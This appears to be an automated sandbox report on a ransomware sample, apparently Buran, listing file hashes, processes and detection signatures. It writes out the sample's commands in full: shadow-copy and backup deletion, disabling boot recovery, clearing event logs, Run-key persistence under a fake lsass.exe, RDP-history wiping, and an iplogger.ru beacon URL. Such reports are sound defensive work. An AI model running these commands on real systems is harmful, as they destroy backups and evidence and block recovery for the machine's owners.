2* ID: 2311
3* MalFamily: "Malicious"
4
5* MalScore: 10.0
6
7* File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
8* File Size: 435200
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
11* MD5: "636d3c669e36510bf337fd2f1ea64732"
12* SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
13* SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
14* CRC32: "D4F2AC3B"
15* SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
16
17* Process Execution:
18 "OQyoOv9HxQ.exe",
19 "cmd.exe",
20 "reg.exe",
21 "lsass.exe",
22 "cmd.exe",
23 "cmd.exe",
24 "cmd.exe",
25 "cmd.exe",
26 "cmd.exe",
27 "cmd.exe",
28 "cmd.exe",
29 "WMIC.exe",
30 "cmd.exe",
31 "vssadmin.exe",
32 "cmd.exe",
33 "reg.exe",
34 "cmd.exe",
35 "reg.exe",
36 "cmd.exe",
37 "reg.exe",
38 "cmd.exe",
39 "attrib.exe",
40 "cmd.exe",
41 "cmd.exe",
42 "wevtutil.exe",
43 "cmd.exe",
44 "wevtutil.exe",
45 "cmd.exe",
46 "wevtutil.exe",
47 "cmd.exe",
48 "sc.exe",
49 "lsass.exe",
50 "lsass.exe",
51 "cmd.exe",
52 "PING.EXE",
53 "PING.EXE",
54 "PING.EXE",
55 "PING.EXE",
56 "PING.EXE",
57 "PING.EXE",
58 "PING.EXE",
59 "PING.EXE",
60 "PING.EXE",
61 "PING.EXE",
62 "PING.EXE",
63 "PING.EXE",
64 "PING.EXE",
65 "PING.EXE",
66 "PING.EXE",
67 "PING.EXE",
68 "PING.EXE",
69 "PING.EXE",
70 "PING.EXE",
71 "PING.EXE",
72 "PING.EXE",
73 "PING.EXE",
74 "PING.EXE",
75 "PING.EXE",
76 "PING.EXE",
77 "PING.EXE",
78 "PING.EXE",
79 "PING.EXE",
80 "PING.EXE",
81 "PING.EXE",
82 "PING.EXE",
83 "PING.EXE",
84 "PING.EXE",
85 "PING.EXE",
86 "PING.EXE",
87 "PING.EXE",
88 "PING.EXE",
89 "PING.EXE",
90 "PING.EXE",
91 "PING.EXE",
92 "PING.EXE",
93 "PING.EXE",
94 "PING.EXE",
95 "PING.EXE",
96 "PING.EXE",
97 "PING.EXE",
98 "PING.EXE",
99 "PING.EXE",
100 "PING.EXE",
101 "PING.EXE",
102 "PING.EXE",
103 "PING.EXE",
104 "PING.EXE",
105 "PING.EXE",
106 "PING.EXE",
107 "PING.EXE",
108 "PING.EXE",
109 "PING.EXE",
110 "PING.EXE",
111 "PING.EXE",
112 "PING.EXE",
113 "PING.EXE",
114 "PING.EXE",
115 "PING.EXE",
116 "PING.EXE",
117 "PING.EXE",
118 "PING.EXE",
119 "PING.EXE",
120 "PING.EXE",
121 "PING.EXE",
122 "PING.EXE",
123 "PING.EXE",
124 "PING.EXE",
125 "PING.EXE",
126 "PING.EXE",
127 "PING.EXE",
128 "PING.EXE",
129 "PING.EXE",
130 "PING.EXE",
131 "PING.EXE",
132 "PING.EXE",
133 "services.exe",
134 "svchost.exe",
135 "WmiPrvSE.exe",
136 "svchost.exe",
137 "taskeng.exe",
138 "taskeng.exe",
139 "msoia.exe",
140 "msoia.exe",
141 "taskeng.exe",
142 "WMIADAP.exe",
143 "taskeng.exe",
144 "VSSVC.exe"
145
146
147* Executed Commands:
148 "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
149 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
150 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
151 "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
152 "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
153 "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
154 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
155 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
156 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
157 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
158 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
159 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
160 "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
161 "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
162 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
163 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
164 "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
165 "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
166 "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
167 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
168 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
169 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
170 "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
171 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
172 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
173 "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
174 "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
175 "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
176 "taskeng.exe DA0ED248-9EDB-4144-B9E7-AFC1D00A662A S-1-5-18:NT AUTHORITY\\System:Service:",
177 "taskeng.exe A14B62F8-6D27-44D8-BFCB-66F44117F2A4 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
178 "taskeng.exe 4C64B42C-C15C-4AFB-9A31-7317BC95FE05 S-1-5-18:NT AUTHORITY\\System:Service:",
179 "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
180 "taskeng.exe F7093373-6201-40B8-8D09-6E7E59E028EB S-1-5-18:NT AUTHORITY\\System:Service:",
181 "C:\\Windows\\system32\\vssvc.exe",
182 "vssadmin delete shadows /all /quiet",
183 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
184 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
185 "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
186 "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
187 "wevtutil.exe clear-log Application",
188 "wevtutil.exe clear-log Security",
189 "wevtutil.exe clear-log System",
190 "sc config eventlog start=disabled",
191 "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
192 "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
193 "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
194
195
196* Signatures Detected:
197
198 "Description": "Behavioural detection: Executable code extraction",
199 "Details":
200
201
202 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
203 "Details":
204
205
206 "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
207 "Details":
208
209 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
210
211
212 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
213
214
215 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
216
217
218 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
219
220
221 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
222
223
224 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
225
226
227 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
228
229
230 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
231
232
233 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
234
235
236 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
237
238
239 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
240
241
242 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
243
244
245 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
246
247
248 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
249
250
251 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
252
253
254 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
255
256
257 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
258
259
260 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
261
262
263
264
265 "Description": "Possible date expiration check, exits too soon after checking local time",
266 "Details":
267
268 "process": "lsass.exe, PID 2296"
269
270
271
272
273 "Description": "Anomalous file deletion behavior detected (10+)",
274 "Details":
275
276 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran"
277
278
279 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran"
280
281
282 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
283
284
285 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
286
287
288 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
289
290
291 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
292
293
294 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
295
296
297 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
298
299
300 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
301
302
303 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
304
305
306 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
307
308
309 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
310
311
312 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
313
314
315 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
316
317
318 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
319
320
321 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
322
323
324 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
325
326
327 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
328
329
330 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
331
332
333 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
334
335
336 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
337
338
339 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
340
341
342 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
343
344
345 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
346
347
348 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
349
350
351 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
352
353
354 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
355
356
357 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
358
359
360 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
361
362
363 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
364
365
366 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
367
368
369 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
370
371
372 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
373
374
375 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
376
377
378 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
379
380
381 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
382
383
384 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
385
386
387 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
388
389
390 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
391
392
393 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
394
395
396 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
397
398
399 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
400
401
402 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
403
404
405 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
406
407
408 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
409
410
411 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
412
413
414 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
415
416
417 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
418
419
420 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
421
422
423 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
424
425
426 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
427
428
429 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
430
431
432 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
433
434
435 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
436
437
438 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
439
440
441 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
442
443
444 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
445
446
447 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
448
449
450 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
451
452
453 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
454
455
456 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
457
458
459 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
460
461
462 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
463
464
465 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
466
467
468 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
469
470
471 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
472
473
474 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
475
476
477 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
478
479
480 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
481
482
483 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
484
485
486 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
487
488
489 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
490
491
492 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
493
494
495 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
496
497
498 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
499
500
501 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
502
503
504 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
505
506
507 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
508
509
510 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
511
512
513 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
514
515
516 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
517
518
519 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
520
521
522 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
523
524
525 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
526
527
528 "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
529
530
531
532
533 "Description": "Guard pages use detected - possible anti-debugging.",
534 "Details":
535
536
537 "Description": "A process attempted to delay the analysis task.",
538 "Details":
539
540 "Process": "WmiPrvSE.exe tried to sleep 361 seconds, actually delayed analysis time by 0 seconds"
541
542
543 "Process": "PING.EXE tried to sleep 345 seconds, actually delayed analysis time by 0 seconds"
544
545
546 "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
547
548
549 "Process": "taskeng.exe tried to sleep 488 seconds, actually delayed analysis time by 0 seconds"
550
551
552
553
554 "Description": "Performs HTTP requests potentially not found in PCAP.",
555 "Details":
556
557 "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
558
559
560
561
562 "Description": "A process created a hidden window",
563 "Details":
564
565 "Process": "OQyoOv9HxQ.exe -> C:\\Windows\\System32\\cmd.exe"
566
567
568 "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
569
570
571
572
573 "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options (note: in the matched command below the /V switch is the value-name option of the embedded reg add invocation, not cmd.exe's own /V delayed-expansion switch)",
574 "Details":
575
576 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
577
578
579
580
581 "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
582 "Details":
583
584 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
585
586
587
588
589 "Description": "A ping command was executed with the -n argument possibly to delay analysis",
590 "Details":
591
592 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
593
594
595 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
596
597
598 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
599
600
601
602
603 "Description": "Uses Windows utilities for basic functionality",
604 "Details":
605
606 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
607
608
609 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
610
611
612 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
613
614
615 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
616
617
618 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
619
620
621 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
622
623
624 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
625
626
627 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
628
629
630 "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
631
632
633 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
634
635
636 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
637
638
639 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
640
641
642 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
643
644
645 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
646
647
648 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
649
650
651 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
652
653
654 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
655
656
657 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
